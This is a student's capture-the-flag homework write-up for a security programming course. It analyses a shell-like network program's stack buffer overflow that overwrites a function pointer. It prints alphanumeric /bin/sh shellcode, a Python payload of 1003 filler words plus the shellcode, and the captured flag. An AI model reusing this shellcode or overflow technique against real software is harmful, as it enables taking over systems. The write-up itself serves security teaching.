nphw1 Writeup
Security Programming Homework 2-1
Intelligence Gathering
- There is a vulnerability in piece of code which contains
strtok()
- There is a
call eax
in the binary - Because it is an interactive shell program, bad characters are 0x00, 0x0a, 0x2f (filter out by specific function in the program)
De-complie the binary
It is hard to debug using gdb. A possible method is to use gdbserver to do remote debugging. But sadly, I do not have time to learn how to use it. Maybe next time…
So I turned up using IDA Pro to do the static analysis. By decompilation, bunch of functions showed up:
...
frame_dummy
passCmdline
splitCmdline
parseArgv
printEnv
setEnv
getResult
sendResult
closePipes
exeCmd
nextLine
main
passPipe
addPipe
delPipe
...
By doing some observation, I picked up three interesting functions for deeper
inspection: main
, passCmdline
, splitCmdline
, exeCmd
.
Offset of cmdline | Meaning |
---|---|
0 | pointer of whole command line |
1 - 10000 | pointer of each word |
10001 | number of words in whole command line |
10002 - 11001 | single command, seperated by pipe char |
11002 | argc |
11003 | not important |
11004 | stdout |
11005 | pointer of function printEnv() |
11006 | pointer of string “printenv” |
11007 | pointer of function setEnv() |
Since the program uses function pointer to call printEnv(), we can simply put our shellcode to replace the original printEnv() with the aid of buffer overflow.
According to the table above, stack overflow will happen when we type more than 1000 words in one single command (commands are seperated by ‘|’). To overwrite index 11005 with our shellcode, we need to stuff 1003 words in total.
The 1005th word will overwrite the pointer of the string “printenv”, which used to compared to the very first word. When they are equal, the program will run into printEnv(). So our job is to ensure they will be the same, otherwise it won’t call our shellcode.
Shellcode
The shellcode for execute /bin/sh
is showed following, grab from the
Internet. See the references at the end of this article for more information.
PYj0X40PPPPQPaJRX4Dj0YIIIII0DN0RX502A05r9sOPTY01A01RX500D05cFZBPTY01SX540D05ZFXbPTYA01A01SX50A005XnRYPSX5AA005nnCXPSX5AA005plbXPTYA01Tx
Exploitation
The first word should be the same as the last word, and the shellcode should be 1004th word. That’s all!
payload = 'a ' * 1003
payload += 'PYj0X40PPPPQPaJRX4Dj0YIIIII0DN0RX502A05r9sOPTY01A01RX500D05cFZBPTY01SX540D05ZFXbPTYA01A01SX50A005XnRYPSX5AA005nnCXPSX5AA005plbXPTYA01Tx '
payload += 'a'
Don’t forget to append a new line character to fire our payload!
Flag
The flag is SECPROG{N3tw0rk_Pr0gr4mm1ng_h0m3w0rk_1s_e4s1er}